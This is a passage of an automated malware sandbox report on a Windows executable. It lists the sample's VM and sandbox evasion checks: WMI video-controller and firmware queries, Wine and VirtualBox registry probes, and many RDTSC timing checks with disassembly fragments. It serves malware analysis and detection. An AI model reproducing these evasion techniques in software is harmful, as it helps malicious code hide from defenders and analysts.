                Source: C:\Users\user\Desktop\YKri2nEBWE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E1273C second address: E1274D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA18DB50E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E1274D second address: E1275E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCA18C4F696h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E128A4 second address: E128AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E12D41 second address: E12D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E12D46 second address: E12D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E12D4C second address: E12D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E12EE6 second address: E12EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FCA18DB50E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E148B4 second address: E1494B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCA18C4F6A2h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov dword ptr [ebp+122D1F5Bh], ebx 0x00000013 mov dword ptr [ebp+122D1F5Bh], edi 0x00000019 popad 0x0000001a push 00000000h 0x0000001c jmp 00007FCA18C4F69Dh 0x00000021 push 97BBF7BFh 0x00000026 ja 00007FCA18C4F6A0h 0x0000002c add dword ptr [esp], 684408C1h 0x00000033 xor ecx, dword ptr [ebp+122D318Ch] 0x00000039 mov edx, dword ptr [ebp+122D3936h] 0x0000003f push 00000003h 0x00000041 mov ecx, ebx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007FCA18C4F698h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f push 00000003h 0x00000061 add dword ptr [ebp+122D1E3Ah], ebx 0x00000067 push 8A0E2394h 0x0000006c push ebx 0x0000006d pushad 0x0000006e ja 00007FCA18C4F696h 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E1494B second address: E1498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 35F1DC6Ch 0x0000000d mov dword ptr [ebp+122D1C71h], edi 0x00000013 lea ebx, dword ptr [ebp+1244F78Bh] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FCA18DB50E8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dx, si 0x00000036 push eax 0x00000037 push esi 0x00000038 je 00007FCA18DB50ECh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E149D8 second address: E149F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14AEB second address: E14B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14B58 second address: E14B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14B5E second address: E14BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D1D81h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FCA18DB50E8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D3B2Ah] 0x00000031 mov dword ptr [ebp+122D37A5h], edi 0x00000037 call 00007FCA18DB50E9h 0x0000003c jmp 00007FCA18DB50EBh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jns 00007FCA18DB50E8h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14BBF second address: E14BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14BC5 second address: E14C05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d jmp 00007FCA18DB50F6h 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCA18DB50F8h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C05 second address: E14C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C0B second address: E14C24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCA18DB50EBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C24 second address: E14C29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C29 second address: E14C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FCA18DB50E8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D1E66h], ebx 0x0000002c clc 0x0000002d push 00000003h 0x0000002f adc si, 779Ch 0x00000034 jmp 00007FCA18DB50ECh 0x00000039 push E6B39F79h 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 je 00007FCA18DB50E6h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E14C7C second address: E14C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC8DA second address: DFC8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50EFh 0x00000009 popad 0x0000000a ja 00007FCA18DB50EEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC8FC second address: DFC901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC901 second address: DFC925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCA18DB50E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jo 00007FCA18DB50E6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA18DB50EAh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E34B55 second address: E34B71 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FCA18C4F69Eh 0x00000010 jl 00007FCA18C4F696h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E353EC second address: E353F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E353F2 second address: E3540B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FCA18C4F69Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E3554B second address: E35567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35567 second address: E3557E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA18C4F69Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E356F5 second address: E35705 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007FCA18DB50E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35705 second address: E3570F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18C4F696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B4C second address: E35B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B52 second address: E35B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B56 second address: E35B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B5A second address: E35B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E35B65 second address: E35B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E360EE second address: E3611E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FCA18C4F6A9h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCA18C4F69Fh 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: DFC8F6 second address: DFC8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E363D5 second address: E3640E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pop ecx 0x0000000e jg 00007FCA18C4F6C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FCA18C4F6A5h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01804 second address: E01808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01808 second address: E01814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01814 second address: E01818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E01818 second address: E0181E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E3A385 second address: E3A39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18DB50F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E09F99 second address: E09FB4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA18C4F6A2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E09FB4 second address: E09FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E41D91 second address: E41D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E41D97 second address: E41D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42079 second address: E4209B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCA18C4F6A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42470 second address: E42476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42476 second address: E42486 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA18C4F696h 0x00000008 jnc 00007FCA18C4F696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42486 second address: E42490 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA18DB50ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42490 second address: E424AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FCA18C4F6A2h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42625 second address: E4262B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4262B second address: E42631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E42631 second address: E42644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jng 00007FCA18DB50E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4559F second address: E455EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jl 00007FCA18C4F696h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 jns 00007FCA18C4F6A2h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007FCA18C4F6A6h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jng 00007FCA18C4F69Ch 0x0000002a jg 00007FCA18C4F696h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E455EC second address: E45630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e js 00007FCA18DB50ECh 0x00000014 ja 00007FCA18DB50E6h 0x0000001a pop edi 0x0000001b pop eax 0x0000001c xor edi, 24686CEFh 0x00000022 jmp 00007FCA18DB50ECh 0x00000027 push 030E6A92h 0x0000002c push eax 0x0000002d push edx 0x0000002e push edi 0x0000002f jnl 00007FCA18DB50E6h 0x00000035 pop edi 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E459F8 second address: E459FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E459FC second address: E45A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E45A06 second address: E45A29 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FCA18C4F6A3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E45B26 second address: E45B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E461A0 second address: E461A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46361 second address: E46365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46365 second address: E46380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCA18C4F6A2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46406 second address: E4640A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4640A second address: E46414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46414 second address: E46418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464DC second address: E464E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464E1 second address: E464E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464E6 second address: E464F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA18C4F696h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464F9 second address: E464FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4674B second address: E46759 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46759 second address: E4675D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4776E second address: E47773 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E47773 second address: E47817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FCA18DB50F5h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FCA18DB50E8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push eax 0x00000029 jbe 00007FCA18DB50ECh 0x0000002f sub dword ptr [ebp+122D1E6Eh], ecx 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FCA18DB50E8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 call 00007FCA18DB50EEh 0x00000057 mov esi, eax 0x00000059 pop esi 0x0000005a mov dword ptr [ebp+122D29E4h], ecx 0x00000060 mov dword ptr [ebp+122D1F3Ah], esi 0x00000066 push 00000000h 0x00000068 cld 0x00000069 mov esi, dword ptr [ebp+122D3A4Ah] 0x0000006f xchg eax, ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FCA18DB50EBh 0x00000077 rdtsc
